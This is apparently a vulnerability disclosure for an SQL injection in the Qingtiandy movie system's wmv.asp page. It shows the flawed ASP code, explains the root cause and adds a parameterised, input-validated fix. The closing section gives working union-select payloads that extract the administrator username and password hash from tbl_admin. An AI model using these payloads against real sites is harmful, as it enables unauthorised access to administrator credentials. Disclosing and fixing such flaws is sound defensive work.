睛天电影系统 (Qingtiandy Movie System) SQL Injection Vulnerability 0day
Author: My5t3ry
Official site: http://www.qingtiandy.cn/
Vulnerable file: /look/template/wmv.asp
Code:
<%
IF Not ChkPost() Then
    response.Redirect G_error_page_1
    response.End()
End IF
id=replace(request("url"),"'","")   ' only the single quote is filtered
set rs=conn.execute("select top 1 url,id from qingtiandy_movieurl_tudou where id="&id)   ' id is concatenated straight into the SQL
IF rs.Eof Then
    response.Redirect G_error_page_1
    response.End()
Else
    url=rs(0)
End IF
%>
<object classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" name="wmp" width="508" height="415" align="middle" id="wmp">
    <param name="url" value="<%=url%>">   <!-- the queried url is echoed here -->
    <param name="stretchToFit" value="0">
    <param name="PlayCount" value="1">
    <param name="volume" value="100">
    <param name="mute" value="0">
    <param name="windowlessVideo" value="0">
    <param name="fullScreen" value="0">
</object>
<script language=javascript>
function wmpfull() {
    wmp.fullscreen = "1";
}
document.ondblclick=wmpfull
</script>
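The root cause is that stripping single quotes does nothing for a numeric column: the id is still spliced into the query text, so a union clause goes through untouched. The following hardened replacement for the lookup is an added example, not the vendor's code; it assumes conn is an open ADODB.Connection and that ChkPost() and G_error_page_1 exist as in the original file.

```vbscript
<%
' Added example, not part of the original wmv.asp. Two changes: the id is
' validated as a plain integer, and it is bound as an ADO parameter so the
' value never becomes part of the SQL text.
Const adInteger = 3
Const adParamInput = 1

If Not ChkPost() Then
    Response.Redirect G_error_page_1
    Response.End
End If

Dim rawId, id, cmd, rs, url, re
rawId = Trim(Request("url"))

' Accept only 1-9 decimal digits. IsNumeric alone would still pass
' "-1" or "1e3", so a pattern is used instead.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Redirect G_error_page_1
    Response.End
End If
id = CLng(rawId)

' Parameterised query: "?" is the ADO placeholder, the value travels separately.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select top 1 url,id from qingtiandy_movieurl_tudou where id=?"
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , id)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Redirect G_error_page_1
    Response.End
Else
    url = rs(0)
End If
rs.Close
%>
<object classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" name="wmp" width="508" height="415" align="middle" id="wmp">
    <!-- encode on output too, so a stored value cannot break out of the attribute -->
    <param name="url" value="<%=Server.HTMLEncode(url)%>">
</object>
```

The same pattern applies to every other page in the system that builds SQL from request input with replace() alone.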
Exploit:
javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_username,2 from tbl_admin'>科幻片</a> ");
Open the printed link and view the page source: the text following <param name="url" value=" is the administrator username.
To obtain the administrator password MD5:
javascript:document.write("<a href='/look/template/wmv.asp?url=-1 union select str_pass,2 from tbl_admin'>科幻片</a> ");